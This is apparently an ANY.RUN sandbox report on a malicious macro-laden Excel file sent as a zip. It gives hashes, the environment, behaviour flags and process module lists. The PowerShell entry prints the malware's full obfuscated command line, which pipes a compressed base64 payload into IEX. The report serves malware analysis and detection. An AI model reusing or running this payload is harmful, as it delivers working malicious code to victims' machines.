General Info

File name

Documento_030645_FT_20190415_0009002_.xls.zip

Full analysis
https://app.any.run/tasks/86c32d56-81b7-41cd-b2c6-a4a6bc2647eb
Verdict
Malicious activity
Analysis date
4/15/2019, 09:23:24
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

ce58be61489c36793de66903bb1c5bd7

SHA1

6725e3077eb5e9259fb302169f39f0f70ff4e963

SHA256

a04aa942f16874466a7ec9b8ab2c0428fdcf455dc3db2d332afba58d13e1c37b

SSDEEP

768:9toKxq+4StY7p0+1x70L8QTD8kP6GpRFTvUpbbXuEjEs7vJNjNoP:jxqItcO8qAQFTvUBbXHj7Ju

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Executes PowerShell scripts
  • EXCEL.EXE (PID: 1092)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 1092)
Executes PowerShell scripts
  • powershell.exe (PID: 1348)
Creates files in the user directory
  • powershell.exe (PID: 1348)
  • powershell.exe (PID: 2340)
Uses RUNDLL32.EXE to load library
  • rundll32.exe (PID: 2672)
Application launched itself
  • rundll32.exe (PID: 2672)
  • powershell.exe (PID: 1348)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 1092)
Creates files in the user directory
  • EXCEL.EXE (PID: 1092)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
null
ZipCompression:
Deflated
ZipModifyDate:
2107:09:22 18:42:24
ZipCRC:
0x47c51c89
ZipCompressedSize:
44431
ZipUncompressedSize:
77312
ZipFileName:
Documento_030645_FT_20190415_0009002_.xls

Screenshots

Processes

Total processes
41
Monitored processes
7
Malicious processes
1
Suspicious processes
1

Behavior graph

+
start winrar.exe no specs rundll32.exe no specs rundll32.exe no specs mctadmin.exe no specs excel.exe no specs powershell.exe no specs powershell.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3044
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\installer\{90140000-003d-0000-0000-0000000ff1ce}\xlicons.exe
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
2672
CMD
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl
Path
C:\Windows\System32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\intl.cpl
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\input.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\propsys.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\kbdit.dll

PID
3296
CMD
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL input.dll
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\input.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\ime\sptip.dll
c:\program files\windows nt\tabletextservice\tabletextservice.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\kbdit.dll

PID
3584
CMD
C:\Windows\system32\mctadmin.exe
Path
C:\Windows\system32\mctadmin.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MCTAdmin
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mctadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
1092
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\winmm.dll

PID
1348
CMD
powershell -w 1 -nOPROF -NONinTe -exEcUtI BYPass -C "set-variable -name "LB" -value "I"; set-variable -name "I" -value "E"; set-variable -name "V" -value "X"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString()('('' & ((gv ''''*MDr*'''').naMe[3,11,2]-Join'''''''') (neW-obJECt syStEM.Io.comPREssioN.deFlATEsTrEaM( [IO.MeMorYstrEAm][cONveRt]::frombAsE64STring( ''''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'''' ), [io.COmPressioN.CoMpReSSIOnmodE]::DeCoMpReSS )|foReach{ neW-obJECt iO.StreAMREaDeR($_, [SystEM.tEXT.ENCOdinG]::AsCII ) }).REAdtoEND( )'')')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
